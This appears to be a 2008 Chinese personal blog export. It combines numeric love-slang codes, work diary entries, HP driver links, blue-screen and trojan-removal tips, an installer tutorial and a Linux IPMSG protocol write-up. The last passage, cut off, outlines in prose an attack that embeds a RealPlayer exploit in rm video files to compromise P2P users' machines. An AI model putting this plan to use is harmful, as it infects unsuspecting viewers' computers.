      57386 我去上班了 57410 我心属于你 574839 我其实不想走

      57520 吾妻我爱你 576 我去了 5776 我出去了

      578 补习班 58 晚安 584520 我发誓我爱你

      586 我不来 587 我抱歉 5871 我不介意

      592 我好饿 59240 我最爱是你 59420 我就是爱你

      59430 我就是想你 59520 我永远爱你 596 我走了

      5976 我到家了


      6 字部


      609 到永久

      6120 懒得理你 6785753 老地方不见不散

      6868 溜吧!溜吧!

      687 对不起


      7 字部


      70345 请你相信我

      706 起来吧 70626 请你留下来

      706519184 请你让我依靠一辈子

      7086 七零八落 7087 请你别走

      70885 请你帮帮我

      721 亲爱的 729 去喝酒

      7319 天长地久

      737420 今生今世爱你 73748096 今生今世伴你左右

      73807 情深怕缘浅

      740 气死你 7408695 其实你不了解我

      745 气死我

      745420 其实我是爱你 7474074 去死去死你去死

      74839 其实不想走

      756 辛苦了 765 去跳舞

      7678 吃饱了吗

      770880520 亲亲你抱抱你我爱你 7731 心心相印

      7752 亲亲吾爱

      775885 亲亲我抱抱我 77543 猜猜我是谁

      77895 紧紧抱着我

      786 吃饱了 7998 去走走吧


      8 字部


      8006 不理你了

      8013 伴你一生 8074 把你气死

      8084 BABY

      809 保龄球 82475 被爱是幸福

      825 别爱我

      837 别生气 8384 不三不四

      85 帮我 85941 帮我告诉他 885 帮帮我

      860 不留你 865 别惹我 8716 八格耶鲁(日语混蛋)

      881 拜拜唉 8834760 漫漫相思只为你 886 拜拜罗

      898 分手吧


      9 字部


      902535 求你爱我想我

      907753 叫你去吃午餐 9089 求你别走

      910 就依你

      918 加油吧 920 好爱你

      9213 钟爱一生

      930 好想你 93110 好想见见你

      940194 告诉你一件事 95 救我 98 久发

      987 对不起 9908875 求求你别抛弃我 995 救救我

      9958 救救我吧!]]> 2008-03-09 16:37:05 http://86wf.mytupa.com/blog/view.php?id=197e10b9d1d3baf7c3e897fde9aa748e 第二篇(http://86wf.mytupa.com/blog/V-df59ff24-e6b4-0227-999f-6ec817a11972.html)
第一篇(http://86wf.mytupa.com/blog/V-06c98a38-bef6-d815-8d75-bf3ba33ca804.html)也写够字
了...

3.9

昨天去北京FB了...一切良好....好多人呀..呵呵!
早上7点过回来...睡觉..
下午醒来玩会游戏.感觉又没意思了..

觉得又可以做东西了...准备做新的电子杂志....加油向永恒群里的大哥们学习。。
看别个做的多好。。

找点东西充实自己吧，不然天天玩游戏。。好无聊。。现在的游戏都N垃圾。
见到了很多牛人，但没什么可说的。。。别个都会踢球，对球员的了解也比偶多。
嘿嘿，除了吃饭喝酒的时候我多说了几句外。。看球的时候基本上无话可说。。
FB也就那样。。。高兴高兴。。。
也算是充实生活的一种方法。


太空虚了。。。不知道做什么。。。一晚上就在这做听着歌。。
看来确实要离开网络寻找下什么东东了。。。
职业不允许，JJ说过少玩电脑。。。
网络给人带来了很多。。却也让人失去了很。。
现在终于明白这点了。。。
看来是时候改变下自己了。
不知道自己心里想的能实施不。。。东西还会继续做不。
上次就是因为到后面没心情做了，所以匆匆结尾。。。现在再一看这。。感觉非常失败。。还不如不做。
考虑下是不是可以不做电子杂志，他太花哨了。。。
做成CHM格式的电子书，要好点不呢。虽然可能没有图片。。但是没有这么花哨，感觉应该要好些。
试下吧。主要还是为了更加的了解一些事。

也许应该离开这一些时间，在一地方呆久确实会感觉到有些不同的感觉。
也许应该像以前那样子，自己根本就不会习惯现在的生活。

。哎。


3。10
看到PP了。。。嘿嘿。。

现在写日记都习惯性早上一写，晚上一写。。

今天忙一天.意料之中.每周一和周六都是最忙的..不知道为什么...一周的开始和结束永远是这么忙.
接触到电脑的古董了..99年4月的内存.嘿嘿,虽然以前在学校和在家的时候都用过老电脑但没有今天这样
的近距离和仔细...嘿嘿太不一般了..以前的主板BIOS..嘿嘿.差点以为修改不了..后来才看是上下选的

年代久了,弄起来真麻烦,不支持移动光驱..烦.

公司的人际关系确实复杂...我又等于小背了一个黑锅..嘿嘿,不存在,不爽老子就回家.

下午下班前打开群里不认识的朋友的日志。吃完饭后回来一看，原来她心里有这么多的不满！哎。。
原来我算是比较幸福的，至少家里没为难过我什么。

庆典视频下下来了。。真爽。。。要是有翻译就更爽了。

下午的时候头检查学习的情况了。。。很不令他满意。
刚才又过来叮嘱我一下。
我学肯定要学，现在不玩游戏，上网也无聊。。所以我一定得找东西充实自己，那么
强迫自己学习不喜欢的东西够充实的吧。英语，excel,VB,。。。。
3.12
植树节...国米的树却被砍掉了...
早上一看输了...其实输了没什么,但没想到馒头辞职了.....555555
不知道好还是不好..为什么不能像曼联那样一直由一教练执教...
哎....啥子都不说了.馒头走好.
3.13
10号发工资...到今天还没打在卡上...MS听小道消息要拖到25号...操...........

早上来电脑就和我作对....我火一大就不开他...先把昨天拖下来的事搞定....

回来给他理理线..启动.OK.没问题..

一看新闻....馒头不走了...老爹理智多了...现在知道稳定了...

馒头加油...走自己的路让别人说去吧....

这两天都比较轻闲,有时间学习领导交待的内容.但是很慢呀...哎
并且感觉没有目标..不知道学到哪才算KO.

感觉人越来越老了.............
心理越来越乱了.想得多了.....
还是睡觉好.啥子都不用想.........
这周日应该不去哪了吧,能睡个好觉了吧..天天都感觉睡不爽...
如果没有网络,我就等于与世隔绝,天天早上7:40起床,8:00上班
11:50下班吃饭睡觉,13:00继续上班,17:00下班吃饭.晚上继续
上网,22:00回宿舍看电视到23:30,上床睡觉....
日子一天一天的这样过.......好那个呀....一周不出一回公司大门,
哎.
3。17
好多天了，本来想写的都没有动键盘。。。
工作上由于meibu的问题，害得现在要解释更加清楚了。。。
我现在还是以为是每步的问题，因为早上来的时候确实看了nst也开不了。。
可是领导一来就能开了。。。哎。
其实还是犯错了，没有去看下100上面的解析软件是否正常运行。

一会还得打电话搞清楚领导交待的事。。。

世态炎凉。。。哎。看着国米就如这话一样。。一点也不和谐。。
昨天去论坛翻老帖子了。。。被版主亮黄牌了。。不刁他。
封就封，论坛的人气越来越低了。。。。。。。。。
现在网络方面的管理也越来越乱了。。。。。。。。
学习--工作--再学习。
终于理解老图的签名了。
3.19
日子一天一天的过去,学习...哎...还是学不进去呀...
为什么......为什么....
心情还是很乱...
烦.......
3.20
昨天和JJ说了些心理话，心情要好点了。最后叫她给偶手机号，她不给，看来偶像是坏人。。嘿嘿
今天早上换代理的时候QQ被锁了，去激活的时候修改密码，不知道狗日的咋个整的。。。再登录密码就错误了。。拿手机找回密码竟然不行。。狗日的TX。。。。。。。。XXXXXXX申诉填了，如果再找不回来我就不用QQ了。。。日他妈的。。。。
迟早这一天都要来临。。。。。。
心情还是烦。
马上上午要过完了。。。心里没有一点快乐的影子。。。。始终是坏坏的。。哎
昨天晚上领导进路由器里看流量统计了。。给了三个IP叫查。。三个全是自动分配的。。查个屁呀。
其中有一个就是自动分配到他机子上的。。现在想起来有点搞笑了。
慢慢的要变化了。。换种方式生活。。。网络真的让我变得更加的孤独了。。哎。。。。。
无聊的生活着。无所谓的活着。。不知道活着为了什么，不知道现在能做什么。。。一切的一切都变
得那么的不重要，一切的一切都让我感觉不到充实。
生活也许就是这样吧。
原来生活就是这样的。
4.3

今天把校内弄好了....这里速度有点慢...可能得同时更新了.
这一久一直玩英雄之门,没念头写日记.CHM书也搞得差不多了..想再弄点也没心情.
今天领导找我谈话了..说了关于怎样工作的事..

我快工作一年了(他说的)其实也就半年...嘿嘿.说我不懂得如何工作.这我承认。
叫我有什么想法可以用书面报告给领导提。领导不当回事的话继续提。那样才能得到重视。
我自己呢。永远是一点点就满足的。不会提什么的。。。永远是一副不认真的样子。
可能这就是我的弱点吧。。工作始终融合不进去。始终是混日子。。。。
也许没有找到适合我的环境。。在这虽然这工作是网管，也和我想要的差不多。但是。。。
很多因素让我感觉不到什么可以值得奋斗的地方。
哎。。。CCNA到现在一点也没看。。。。可能今年的允诺要OVER了。。。
哎。。。
4.5
昨天去双井了。。玩到今天。
正好碰到苗走。。。离开北京了。。。。哎。又一个走了。。。。以后什么时候才能再见
回来的时候把珍藏国米买到了。。然后理头了。。一个小小的光头。。差不多。
算是我削发名志吧。。。一定得把CCNA考了。。然后跳跳。。。！
加油。。
4.10
这一久都想写日记,但就是没时间写.终于把CHM文件做完了..虽然里面还有很多东西没加,但我的兴趣又只能到此了..哎...这两天CCNA也看得少了..并且有点累...今天晚上开始就看CCNA了.上班期间就看excel,昨天头问学得如何....哎..VB还没看呢....难呀难..
公司的服务器的搬迁史........从我屋到总经理秘书--质检科--休息室.....以后又不知道要搬到哪屋去...
4.15
昨天请了天假，休息了一天。。感觉休息的时候比上班日子还难过。只要上班时事情不是大多就OK。。
这公司不知道还能呆多久。上个周叫买的网线到现在还没买来。。。。哎。。。听说生产那边很多老员工走了。。。哎。
4。20
哎。。。。今天摔了一大跤。。。。差点OVER了。多希望OVER呀。。。
这一久每天晚上都是7：00-10：00睡觉，然后玩会电脑，12：00下FB。
其实这样挺好。。。呵呵。。。
4.23
昨天晚上叫去生产加班,没有去...
今天早上领导找到我教训了一通.最后说叫写离职报告....(正合我意)
中午宿舍的同事让我好好考虑叫越级找下领导和另一领导说下.
另一领导找我谈话了..说我性格里带有自卑的情绪，永远以环境不好为借口，对工作产生情绪，没有激情。。。。。想想也是，第一个工作就是这样离开的，应该好好反思下怎样才算好。我觉得我工作做得挺好啥，但是领导的意思就是说我还没有为此工作考虑更多，应该反思下。不然在下一个单位还是做不好，，，还是会像这一样被炒。。。。。。
等他们领导商量怎么办吧，反正我肯定是要走的。
4.24
公司始终想得更精....
人事的叫领导来道歉了...说是说的是气话.......
只能是辞职了....
找我谈话,还是说工作态度不好,,嘿嘿...工作态度不好......
昨天晚上和成都的同学通气了,,,真去成都了..还没给家里说,哎....
5.18
来到成都了。。。在北京和同学道别后就回四川了。。。
在这基本上没上网的地方。现在也是在网吧上。在同学那住着，刚开始还行，感觉现在很那个。。。。哎。。。
工作也没法找，地震让人才市场关门了。。。不知道什么时候才能正常。在同学那快住了一个月了。。。。
太麻烦别个了。。。还是快找房子，找工作吧。。。
哎。。。。。。。
很想回家，很想去重庆找工作。。。。。
6.29
今天真的点很背.手机没了...不知道是不是丢在同学家了..还是被摸了....
郁闷...可能报应来了.]]> 2008-03-09 16:31:22 http://86wf.mytupa.com/blog/view.php?id=0389d3be90592d4fac062e0f1c29b879


再给你提供XP的驱动地址吧！（适合hpv3000系列）
装HP笔记本XP系统找驱动是最烦人的
这是我上网收集HP V3000的驱动下载地址
芯片组驱动                                 
http://h50176.www5.hp.com/local_drivers/25407/sp32555.exe


微软通用音频架构（UAA）总线驱动 -----35.5M（注：如果35.5M的版本安装出现问题，清尝试下载安装另外一个版本的UAA--17.1M）  
http://h50176.www5.hp.com/local_drivers/24695/sp32646.exe   
  17.1M版本
(http://h50176.www5.hp.com/local_drivers/20546/SP32395.exe  )


显卡驱动                                      
http://h50176.www5.hp.com/local_drivers/23854/sp33761.exe

V3010AU下的声卡驱动                  
http://h50176.www5.hp.com/local_drivers/27263/sp34386.exe

网卡驱动                              
http://h50176.www5.hp.com/local_drivers/26308/sp32144.exe

无线网卡-请注意有两个版本，如果您的机器有迅驰的标志，请下载intel的，如果没有，请下载broadcom的
    intel
   http://h50176.www5.hp.com/local_drivers/24995/SP33636.exe
    Broadcom
   http://h50176.www5.hp.com/local_drivers/24256/sp33008.exe
读卡器驱动                           
http://h50176.www5.hp.com/local_drivers/23857/sp32825.exe

快捷键驱动                           
http://h50176.www5.hp.com/local_drivers/27003/sp33258.exe

触摸板驱动                           
http://h50176.www5.hp.com/local_drivers/26689/sp33751.exe
MODEM-ftp://ftp.hp.com/pub/softpaq/sp34501-35000/sp34777.exe]]> 2008-03-04 14:01:31 http://86wf.mytupa.com/blog/view.php?id=0af166a627db9d2c09e96aa1d593593e
在操作计算机的过程中，屏幕常常会出现莫名其妙的蓝屏现象，这些现象一般是由我们的操作不当造成的；而从实践应用来看，系统蓝屏故障尤其容易出现在硬盘的读写操作中。为了有效消除系统蓝屏故障，本文特意从硬盘着手，来向各位详细介绍几则由于硬盘使用不当引发蓝屏故障的解决方法，希望能够帮助各位朋友高效用好自己的硬盘，提升计算机的操作效率。

　　硬盘坏道引发蓝屏故障

　　如果在访问硬盘的过程中，突然访问到磁盘的坏道区域时，就可能导致计算机系统发生蓝屏故障；为此当我们碰到系统蓝屏故障时，应该先依次单击“开始”/“程序”/“附件”/“系统工具”/“磁盘扫描”命令，打开磁盘扫描对话框，然后选择当前访问磁盘所对应的分区符号，并对它执行磁盘扫描操作。倘若发现目标硬盘的确有坏道存在的话，可以尝试在对磁盘分区时将坏道隐藏起来或分出去，然后将计算机的操作系统重新安装一遍，这样就能有效解决系统蓝屏故障了。当然，如果发现坏道出现在以前的C盘分区中的话，那么我们在重装操作系统时应该尝试将系统安装在其他分区中，例如可以考虑安装在D分区或E分区中。

　　线缆老化引发蓝屏故障

　　对于移动硬盘来说，如果其使用的USB连接线缆使用时间比较长的话，很容易发生老化现象，而老化了的数据线缆很难保证硬盘能够稳定地传输数据；因此在发生系统蓝屏故障时，我们应该先确认一下当前移动硬盘的连接线缆是否已经老化，如果已经处于老化状态的话，必须及时更换一条连接线缆。当然，在辨别连接线缆是否老化时，我们可以仔细观察连接线缆的表面是否有太多的裂痕，要是发现裂痕较多的话，那几乎就能证明移动硬盘的连接线缆已经处于老化状态了。另外，连接移动硬盘的USB连接线缆长度最好不要超过一米，不然的话硬盘传输数据将变得很不稳定，十分容易导致系统发生蓝屏故障，这样一来就要求我们尽量不要使用USB延长线来连接移动硬盘。

　　供电不足引发蓝屏故障

　　如果移动硬盘的容量超过30个GB，而没有使用独立的电源进行供电的话，那么访问这样的移动硬盘时就比较容易出现蓝屏故障。当出现由于供电不足的原因而引发的蓝屏故障时，可以尝试使用移动硬盘的其他连接接口来与计算机相连；比方说，有的移动硬盘除了提供USB连接接口外，还为用户提供了功率消耗较小的PS/2接口，当我们使用USB接口连接移动硬盘而系统经常发生蓝屏故障时，就可以换用PS/2接口来连接移动硬盘。另外，如果在使用移动硬盘的时候，计算机还同时使用其他几个USB设备的话，那么移动硬盘很有可能无法从计算机系统中得到足够的电源动力，这样也能造成读写移动硬盘时发生系统蓝屏故障；遇到这种现象时，我们可以想办法将那些平时用得比较少或者暂时用不着的USB设备从计算机上拔下来，确保只留下移动硬盘一个设备，以便保证主板能为其单独进行供电。

　　驱动不兼容引发蓝屏故障

　　在确保电源供电充足的情况下，如果将移动硬盘一插入到计算机的USB接口中时，系统就发生蓝屏故障的话，那多数情况是USB接口的驱动程序与计算机主板驱动程序不相兼容造成的，因为Windows系统内置的USB接口驱动程序相对来说比较旧，这就有可能与某些新主板的驱动程序不完全兼容。为此，当发生由驱动不兼容而引发的蓝屏故障时，我们可以尝试先到网上下载安装对应Windows系统的SP补丁程序，然后再更新一下主板的驱动程序，最后再安装一下移动硬盘自带的USB端口程序，相信这样就能消除由驱动不兼容而引发的蓝屏故障了。

　　插拔不当引发蓝屏故障

　　许多人在使用USB接口的移动硬盘时，总错误认为移动硬盘是一种热拔插设备，支持任意方式、任意时间的拔除，殊不知在移动硬盘正在读写数据的那一瞬间拔除USB移动硬盘的话，就能造成系统发生蓝屏故障，严重的话可能会损坏移动硬盘。在拔出移动硬盘之前，一定要先让移动硬盘停止读写操作，等到屏幕出现安全拔除的提示时，才能对移动硬盘执行拔出操作。在停止硬盘读写操作时，可以先用鼠标双击一下系统任务栏处的“安全删除硬件”图标，然后从弹出的快捷菜单中单击“安全删除……”命令，等到屏幕出现可以安全地拔出设备的提示时，我们再小心地将移动硬盘从计算机的USB端口中拔出来。

　　此外，如果在比较短的时间内对移动硬盘进行频繁插拔的话，也容易造成系统蓝屏故障，这是因为当插入移动硬盘后，Windows系统并不会立即识别出移动硬盘，而需要一定的时间来进行响应，如果在系统还没有来得及响应之前又将移动硬盘拔出来的话，系统就容易出现识别混乱，最终可能引发蓝屏故障。因此一旦插入移动硬盘后，至少要有一分钟以上的时间间隔，才能将移动硬盘从计算机的对应端口中拔出来。]]> 2008-02-28 13:29:10 http://86wf.mytupa.com/blog/view.php?id=eea3a1546c1017c5d3f03ab52ffd6a18
一般人对于病毒木马的防范只是靠杀毒软件防范，现在杀毒软件越来越"垃圾"对于木马的清除出现了一些真空的现象。

在些把我自己的日常杀毒方法给大家介绍下，希望有所帮助吧。


一般的病毒木马，用不着进安全模式就可以解决。
但正常的病毒木马都必须进安全模式才能清除掉。（怎样进安全模式--在开机后一直按F8就会出现一队菜单，菜单中就有安全模式，现在有的机子可能不是F8，有F2，F11的。）
我水平不高，只能依靠工具，手工杀毒还是不大习惯。
用到的工具如下：
sreng2（用来清除启动项，观察HOSTS文件，浏览器加载项，服务项等。）这是最主要的工具。
IceSword（这主要用来删除文件，里面很多项我没掌握怎样用。）
下载地址：
http://iask.sina.com.cn/h/user.php?uid=1463023651

步骤如下：一.打开sreng2，先看启动项
这几项不删除外，其他启动项均可以删除。这样病毒木马就不能开机启动了。
然后再看启动文件夹，这里面的可以全部删除。
继续看服务，服务里有两个一个是应用程序，一个是驱动程序（至今我仍然不能通过驱动程序来检查，里面的东西太多。）点击应用程序，查看有哪些服务启动了的，在右下角可以勾选隐藏已认证的服务，那样更加清楚的看到哪些服务启动了，通过上网查，能发现病毒木马的服务，把他删除掉。
二。利用软件带的系统修复，修复一下电脑。
至此一般的病毒木马启动项，服务均被删除掉了。
然后用杀软或者清除木马的工具杀之。在这推荐（windows清理助手www.arwsp.com）

这是我的方法，技术不到家只能靠工具的帮忙。


可以参考红色代码写的这篇文章
http://86wf.mytupa.com/blog/V-c508d209-bb0b-d155-2b2e-00f6f8507f92.html&cid=d2770acf1081f5918748200e38a3f23b]]> 2008-02-25 16:30:09 http://86wf.mytupa.com/blog/view.php?id=f7996082440ca547ae55f127de2e983c
制作好程序之后，有很多作者都习惯用专业软件来给程序添加一个安装程序包。其实微软的2000和XP系统已经自带了一个小巧的制作安装软件iexpress，大小只有112KB，,存放在\Windows\System32 中。由于是微软自带的程序，所以制作的安装软件具有更好的兼容性。下面笔者就简单介绍该软件的使用方法，希望用这款软件来制作一个比较专业的安装程序包。

　　iexpress的使用方法很简单，只需在运行中输入iexpress就可以。虽然iexpress是一款英文软件，不过制作安装程序包采用的是向导式，操作起来不算很难。在开始的时候有两个选项，一个是创建新的自解压指导文件，另一个是打开已经保存的自解压指导文件，这里我们选择第一个，然后点击下一步（图1）。接下来选择制作安装程序包的三种方式，分别是解压并运行安装、只解压并不运行安装和只压缩（图2），根据自己的实际情况来进行选择。然后我们输入安装软件的名称，这里可以是英文，也可以是汉字。下面设置软件在安装前是否提示用户确认，通常情况选择不提示。



　　接下来添加“用户允许协议”，软件在使用过程当中有什么注意事项和要求都可以写到“用户允许协议”当中，只有用户都同意上面的条件才能正常继续安装（图 3）。然后在下面添加要制作安装的软件，建立文件列表，并且还要指定安装过程中运行的程序和相应的命令（图4）。接下来选择软件在安装过程中的显示模式，分别是默认、隐藏、最大和最小（图5）。


　　　设置在软件安装完成后，提示是否显示提示语句，这里笔者建议选择显示。当一切设置完成后，这时候要设置自解压指导文件的保存位置和名称。这里面包含了软件安装过程中信息，建议保存，以备日后再修改。在下面来设置在软件安装完成后是否重启动（图6），笔者建议如果没有什么特殊情况，不要选择重启电脑。


　　都设置好之后，最后开始制作软件安装包的过程，整个制作过程是在DOS下进行的，这样一个软件的安装程序包就制作完毕。
]]> 2008-02-16 10:33:06 http://86wf.mytupa.com/blog/view.php?id=ff81880965f6af644d10b58efb5b69f3 MD5:ce2c08a87dcb269c3b79ade5fa2ed75b
文件大小:14.9 MB (15,684,564 字节)

下载地址
http://www.bigupload.com/d=U1OJSVHKKT
http://ishare.iask.sina.com.cn/cgi-bin/fileid.cgi?fileid=3145743

杂志内容


]]> 2008-01-28 09:04:18 http://86wf.mytupa.com/blog/view.php?id=4bee506aa1863ec8d86428650b8b3c77

Linux下IPMSG的实现
一、   IPMSG通信协议介绍
声明：下述协议内容略去了一些本程序中没有用到协议内容，最初的Ipmsg协议是用日文写的，下面协议内容由本人翻译自Mr.Kanazawa的英文文档。

        IP信使传输协议(第9版草案)         1996/02/21
                2003/01/14 修订

                H.Shirouzu
            shirouzu@h.email.ne.jp

 
关于IP信使：
  IP信使使用TCP/UDP协议提供收发消息及文件(目录)。
特性：
IP信使能够安装在任何一个安装了TCP/IP协议栈的操作系统上，使用在线用户的动态识别机制，可以和在线所有用户进行信息交换。
运行机制介绍：
使用TCP/UDP端口(默认端口为2425)，消息的收发使用UDP协议，文件(文件夹)的收发使用TCP协议。
1、   命令字：
1)   基本命令字(32位命令字的低8位)
    IPMSG_NOOPERATION     不进行任何操作
    IPMSG_BR_ENTRY     用户上线
    IPMSG_BR_EXIT         用户退出
    IPMSG_ANSENTRY     通报在线
    IPMSG_SENDMSG         发送消息
    IPMSG_RECVMSG         通报收到消息
    IPMSG_GETFILEDATA     请求通过TCP传输文件
    IPMSG_RELEASEFILES   停止接收文件
    IPMSG_GETDIRFILES     请求传输文件夹
2)   选项位(32位命令字的高24位)
IPMSG_SENDCHECKOPT   传送检查(需要对方返回确认信息)
IPMSG_FILEATTACHOPT   传送文件选项
3)   附件类型命令(文件类型命令字的低8位)
IPMSG_FILE_REGULAR   普通文件
IPMSG_FILE_DIR     目录文件
IPMSG_FILE_RETPARENT   返回上一级目录
2、   数据包格式(使用字符串)：
1)   数据包格式(版本1的格式)
版本号(1):包编号:发送者姓名:发送者主机名:命令字:附加信息
2)   举例如下
“1:100:shirouzu:Jupiter:32:Hello”
3、   数据包处理总述：
1)   用户识别
当IPMSG 启动时，命令IPMSG_BR_ENTRY被广播到网络中，向所有在线的用户提示一个新用户的到达(即表示“我来了”)；所有在线用户将把该新上线用户添加到自己的用户列表中，并向该新上线用户发送IPMSG_ANSENTRY命令(即表示“我在线”)；该新上线用户接收到IPMSG_ANSENTRY命令后即将在线用户添加到自己的用户列表中。
2)   收发消息
使用IPMSG_SENDMSG命令发送消息，消息内容添加在附加信息中；在接收消息时，如果对方要求回信确认(IPMSG_SENDCHECKOPT位打开)，则需发送IPMSG_RECVMSG命令并将对方发送的数据包的编号放在附加信息中一同发送至发送消息方
3)   附加文件的扩充(添加于第9版)
带有IPMSG_FILEATTACHOPT位的IPMSG_SENDMSG命令可用来传输文件，文件属性及内容添加在附加信息中，文件内容添加在消息内容后并以’\0’与之分隔开。传输文件时以下信息将被添加到消息内容之后(包括格式)：文件序号:文件名:大小(单位:字节):最后修改时间:文件属性[: 附加属性=val1[,val2…][:附加信息=…]]:\a:文件序号…
(文件大小、最后修改时间和文件属性为十六进制数，如果文件名中包含’:’则使用“::”代替)。
接收端开始接收文件时，请求传输文件命令IPMSG_GETFILEDATA将发送到发送端的TCP端口(和UDP的发送端口相同)，并将发送端发送的包编号:文件序号:偏移量(全为十六进制格式)写到附加信息区一同发送，文件发送端接收到该请求信息并进行校验正确后即开始发送文件(不使用任何格式，亦不进行加密)。
当接收端接收到目录文件时，将发送附加信息区为发送端发送的包编号:文件序号:偏移量(全为十六进制格式)的 IPMSG_GETDIRFILES命令，以用来请求传输目录文件；发送端则将头信息长度:文件名:文件大小:文件属性:文件内容添加到附加信息区(除了文件名和文件内容外，其余皆为十六进制)，头信息长度是从头信息长度开始到文件内容前的‘:’分割符为止的字符个数。
当文件属性为IPMSG_FILE_DIR时，IPMsg能够自动识别其为目录，下一个文件的数据在该目录之后。
当文件属性为IPMSG_FILE_RETPARENT时，IPMsg识别其动作为返回上一级目录，在这种情况下，文件名为‘.’其属性为当前目录的值。
到此本程序所用到的协议已经叙述完毕，由于实现的功能较简单，故删减了一些原IPMSG协议的内容，完整的IPMSG协议请参照如下网址：
http://linuxopen.cugb.edu.cn/Forum/read.php?tid=283

二、   程序实现(Linux下的socket编程)
程序源代码请到
http://linuxopen.cugb.edu.cn/Forum/read.php?tid=453下载，下面简要叙述一下程序设计结构和实现
1、数据结构定义
1) 在线用户信息数据结构，用于存放在线用户信息，并组成用户列表(使用双向链表实现)
  typedef struct ipmsguser
  {
        int         user_num;   /*在线用户编号*/
        struct sockaddr_in   user_addr;
        char         user_name[MAX_USER_NAME_LENGTH];
        char         user_group[MAX_USER_GROUP_LENGTH];
        char         user_machine[HOSTNAME_LENGTH];
        char         append[MAXSOCKBUF];
        char         user_nick[MAX_USER_NAME_LENGTH];
        struct ipmsguser   * next;
        struct ipmsguser   * pre;
  }ipmsg_user_list;
  2) 发送的UDP数据包结构(按照数据包格式设计)
  typedef struct ipmsgdata
  {
        int       version;
        unsigned int   packetno;
        char       sendername[MAX_USER_NAME_LENGTH];
        char     *ip;
        char       senderhost[HOSTNAME_LENGTH];
        unsigned int   com;
        char       append[MAX_APPEND_LEN];
        char       sendfileheader[MAX_SEND_FILE_HEADER_LEN];
  }ipmsgdata;
  3) 传输文件的首部信息结构(按照文件传输协议定义)
  typedef struct transfileheader
  {
        unsigned int       fileID;
        char         filename[PATH_MAX];
        unsigned long long   size;
        unsigned int       mtime;
        unsigned long       fileattr;
  }transfileheader;
  4) 传输目录的首部信息结构(按照目录传输协议定义)
  typedef struct transfolderheader
  {
        int         headersize;
        char         filename[PATH_MAX];
        unsigned long long   filesize;
        unsigned long       fileattr;
        time_t         filemtime;   //文件/文件夹的修改和创建时间
        time_t         filectime;
  }transfolderheader;
  5) 发送多个文件/目录时用于记录信息的结构(用于向发送文件/目录线程传送的参数)
  typedef struct sendfilearg
  {
        int     filenum;
        int       flags;   /*flags用来记录发送到的目的地的形式：1为序号，2为all，3为IP,4为用户名*/
        char       filename[MAXFILESEND][PATH_MAX];   //文件/文件夹名
        unsigned long   fileattr[MAXFILESEND];   /*发送的文件的属性，为标志量，*为0时表示对应的文件名为文件，为1表示对应为目录*/
        char       to[20];   //目的地
  }sendfilearg;
  2、函数说明
int   command(char *cmd);//处理用户输入的命令
void   ipmsgswitch(ipmsgdata * data, char * buff);//解析接收到UDP数据
void       ipmsgsendbcast(struct sockaddr_in *dest, unsigned int com, ipmsgdata *data);//发送UDP数据
ipmsg_user_list *adduser(struct sockaddr_in *useraddrs, struct ipmsguser *q, ipmsgdata *data);//添加用户于用户列表
char   user_exist(struct sockaddr_in *useraddr, ipmsgdata *data); //判断用户是否存在于用户列表
void   *watch_net(void *arg); //监控网络线程的回调函数，用于接收UDP数据
void   del_user(struct sockaddr_in *useraddr, ipmsgdata *data);//删除用户
void   del_all_user();//清空用户列表
ipmsg_user_list *search_user(int *usernum, struct in_addr *useraddr, char *username);//查找某个用户于用户列表
void   *getfiles(void *arg);//接收文件/目录线程的回调函数
void   *sendfiles(void *arg);//发送文件/目录线程的回调函数
int   senddir(char dir[], int socksendfd);//遍历目录树并通过TCP发送目录内容
  3、总体设计
    使用多线程编程技术，一个线程监控网络，用来实时更新用户列表和显示消息；一个线程用来和用户交互，处理用户输入的命令；当接收文件时还会生成一个线程，用于接收文件/目录并存盘；当发送文件/目录时也会生成一个线程，用于发送文件/目录；这就是多线程的好处，可以并行的完成几件事情。在使用多线程编写网络程序时，尤其要注意线程同步问题以及TCP和UDP协议的性质(即TCP为流式协议，UDP为用户数据报协议)。
4、   细节方面的简要说明
在编写网络程序时，处理字符串是经常碰到的问题，TCP流式协议的特性亦应引起高度重视，不过只要记住这一点，以后在这方面就不会遇到大麻烦，现介绍一下 TCP协议的特性，首先TCP协议发送的是字符流，一个TCP包的长度不定，最大为程序员指定的大小，最小可能为0，而且应用层使用send发送的数据可能被内核重新装备再进行发送，所以可能出现这样的情况：多个send语句发送的内容组成了一个TCP包发送给对方，而recv语句则可能接收到0长度的数据，所以在处理接收到数据时应谨慎对待，因为每次recv到的数据并不是想象中的数据长度和数据格式，很可能错位，所以程序需要对数据进行全面的分析。
网络程序很多都使用多线程实现，因为线程只独立拥有栈空间共享堆空间，所以在使用库函数或系统调用时尤其要注意使用的函数是否是线程安全的，如果不是线程安全的，请使用对应的线程安全的函数或自己编写完成同样功能的线程安全的函数。这里介绍两个非线程安全的函数，他们在编写多进程程序时是可以安全的使用的： readdir、strtok，其中readdir为Linux/Unix的系统调用，strtok为标准C库函数，这两个函数都使用了静态变量(由 static修饰)，故为非线程安全的，而进程拥有独立的堆空间和独立的栈空间，故对进程而言他们是安全的，对应于readdir的线程安全函数为 readdir_r，其为POSIX标准函数，在绝大多数UNIX/Linux系统上都可以使用，对应于strtok的线程安全函数我没有找到，但我根据 strtok的glibc的实现自己写了个线程安全的函数(mystrtok)，其取消对静态变量的依赖，故为线程安全的。
还有就是开发网络程序，特别需要注意的是编写安全的网络程序，写的网络程序不要成为对方攻击的目标，这里要提醒注意的是在使用一些容易引起内存溢出的函数时需要考虑是否有其他函数(不会引起溢出的)可用呢？这里列举几个，提起大家的注意，sprintf、strcpy、strcat这三个函数由于在操作时不检查是否越界，所以请考虑使用snprintf、strncpy、strncat代替之。
5、   有待改进的地方
还有很多地方有待改进，win版的IPMSG的功能还有很多，其命令字亦有不少，这里只使用其中较少的几个，主要是为了完成文件/目录的收发功能，而且程序肯定还有很多bug，尚需时日进行调试，这次发布的只是版本1，以后还会有版本2、版本3。

Linux下的IPMSG实现就介绍到这儿，具体代码请到论坛下载，如遇问题请回帖指出，如有不同意见欢迎交流。
欢迎访问社区http://linuxopen.cugb.edu.cn]]> 2008-01-21 14:23:46 http://86wf.mytupa.com/blog/view.php?id=a58d1252c1093a17568eb7c6810b9669

非安全第6期陈莎莎写了篇文章<<通过p2p共享影视文件抓肉鸡>>，里边的抓肉鸡主要思路是在rm影音文件中插入网页木马的 url链接，用户看影音文件到某个时段弹出网页木马的url。其实，利用REALPLAYER本身的漏洞，直接做成网页木马，让用户在看rm的时候直接中马是有更好的效果。因为这样一来，此漏洞利用是与IE无关了，而且打REALPLAYER补丁的人少之又少，成功率还是很高的。只要装有 REALPLAYER或暴风影音支持smil格式等播放器的用户都会中招。
